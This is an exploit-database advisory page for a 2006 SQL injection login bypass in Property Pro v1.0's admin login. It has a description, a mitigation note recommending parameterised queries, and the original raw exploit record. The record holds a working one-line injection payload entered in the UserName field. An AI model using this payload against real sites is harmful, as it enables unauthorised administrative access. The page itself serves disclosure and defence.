header-logo
Suggest Exploit
vendor:
Property Pro
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Property Pro
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability

Property Pro v1.0 is vulnerable to a remote login bypass SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database, allowing the attacker to bypass authentication and gain access to the application.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-13]

Navigation

Suggest Exploit

Services By CQR